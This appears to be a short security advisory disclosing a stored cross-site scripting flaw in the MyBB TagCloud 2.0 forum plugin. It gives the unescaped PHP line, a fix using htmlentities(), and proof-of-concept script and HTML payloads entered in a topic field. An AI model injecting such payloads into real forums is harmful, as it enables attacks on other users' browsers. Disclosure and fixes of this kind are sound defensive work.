====================================================
MYBB TagCloud 2.0 cross site scripting vulnerability
====================================================

Author:     http://www.3ethicalhackers.com
Discovered by:    http://www.3ethicalhackers.com
Original post:   http://www.3ethicalhackers.com
=====================================================================

Description:

MYBB TagCloud 2.0 is an open source plugin, it is used to to show all recent posts.

How to exploit:
Enter html or javascript into topic field, once tagcloud displays the thread it will execute the malicious code
that was set within the topic field.

Download Link: http://www.mybbcentral.com/thread-1681.html
Number of times downloaded: 402

=====================================================================
 
    [ vuln code ]
 
$message .= "<a href=\"".$mybb->settings['bburl']."/showthread.php?tid=".$thread['tid']."\"><span style=\"font-size:".$sizes[$fontsize]."px\">".$thread['subject']."</span></a> |\r\n";
 
   [ Fixed Code ]

$message .= "<a href=\"".$mybb->settings['bburl']."/showthread.php?tid=".$thread['tid']."\"><span style=\"font-size:".$sizes[$fontsize]."px\">".htmlentities($thread['subject'])."</span></a> |\r\n";  
=====================================================================
 
    [ proof of concept ]
 
    Topic Field: <h1>LOLIMADEEVERYTHINGBIG!
   
    ^once tagcloud displays that piece of code, everything within the tagcloud will become huge ;D
   
    Topic Field: <script>javascript:alert("lolcats")</script>
   
    ^once tagcloud displays that piece of code, a message will pop up saying "lolcats"
 
======================================================================

JOIN US IN IRC
IRC.SMASHTHESTACK.ORG #3ETHICAL
FORUMS @ 3ETHICALHACKERS.COM
 
=========================| -=[ E0F ]=- |=================================